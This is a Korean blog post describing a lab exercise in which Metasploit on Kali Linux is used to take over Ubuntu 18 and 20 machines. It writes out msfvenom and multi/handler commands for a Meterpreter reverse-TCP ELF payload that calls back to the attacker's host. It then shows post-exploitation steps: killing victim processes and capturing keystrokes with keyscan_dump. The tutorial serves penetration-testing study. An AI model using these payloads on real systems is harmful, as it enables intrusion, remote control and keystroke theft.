2020. 5. 21. 21:14ㆍ리눅스/칼리
1. 메타스플로이트(metasploit)를 이용하여 우분투에 침투할 것이다.
메타스플로이트란 보안전문가용으로 개발되었으며, 테스트 목적으로 시스템을 해킹하기 위하여 개발되었다. 모의 해킹 또는 침투 테스트(Penetration Testing)을 위한 필수 도구로 알려져 있다.
KALI 리눅스에 기본적으로 설치 되어있다.
2. Ubuntu 18 실습
Metasploit 실행 명령어
# msfconsole
Metasploit을 실행한다.
# show options
Metasploit의 명령어 옵션을 확인 할 수 있다.
리눅스 계열에서 payload를 만들기 위한 확장자명은 다음과 같다. show options에서 확인 할 수 있다.
177- linux/x64/meterpreter_reverse_tcp manual No Linux Meterpreter, Reverse TCP Inline
->use exploit/multi/handler
->set LHOST 192.168.120.136 (자신의 IP)
->set LPORT 10030 (자신의 port번호)
->exploit
차례대로 명령어를 실행한다.
터미널 새 창을 열어 공격용 payload 파일을 만든다.
명령어는 다음과 같다.
# msfvenom –p linux/x64/meterpreter_reverse_tcp[payload list 참고] LHOST=[자신의 IP주소Local host] LPORT=[자신의 port number, Local port]–f elf(리눅스 확장자명) > [파일명].elf
그 후 해당 파일을 피해 컴퓨터로 옮긴다.
(피해컴퓨터의 방화벽이 꼭 해제되어있어야 한다.)
ubuntu18에서 chmod로 실행파일 실행할 권한을 준다.
그 후 payload파일을 실행한다.
# ./abc.elf
피해 PC에서 실행파일을 실행하면 다음과 같은 메시지가 뜬다.
침투 공격이 성공했다.
mkdir 명령어를 입력하여 피해 컴퓨터에 폴더가 생성되었는지 확인한다.
Ubuntu 18에서 파일이 만들어져있다.
즉, KALI에서 Ubuntu 18의 통제권을 가져온 것을 확인 할 수 있다.
3. Ubuntu 20 실습
위와 같다.
다만 ubuntu18과 달리 ubuntu20에서는 실행권한을 주지 않아도 실행 할 수 있다.
그 후 payloa파일을 실행한다.
# ./ubun20.elf
mkdir 1 2 3을 이용하여 우분투20에 폴더를 만들어 본다.
Ubuntu 20의 통제권을 가져온 것을 확인 할 수 있다.
####
침투 후 ps를 입력하면 피해 pc의 프로세스들을 확인 할 수 있다.
kill [ppid]를 입력하면 해당 프로세스를 마음대로 종료 할 수 있다.
keyscan_start ->키보드 제어 시작
keyscan_dump -> 키보드로 입력한 내용을 가져올 수 있다!
'리눅스 > 칼리' 카테고리의 다른 글
DVWA (0) | 2020.07.12 |
---|---|
Zenmap (0) | 2020.07.10 |
SQL Injection (0) | 2020.07.10 |
ARP Spoofing (0) | 2020.05.21 |
칼리 리눅스 설치 (0) | 2020.05.19 |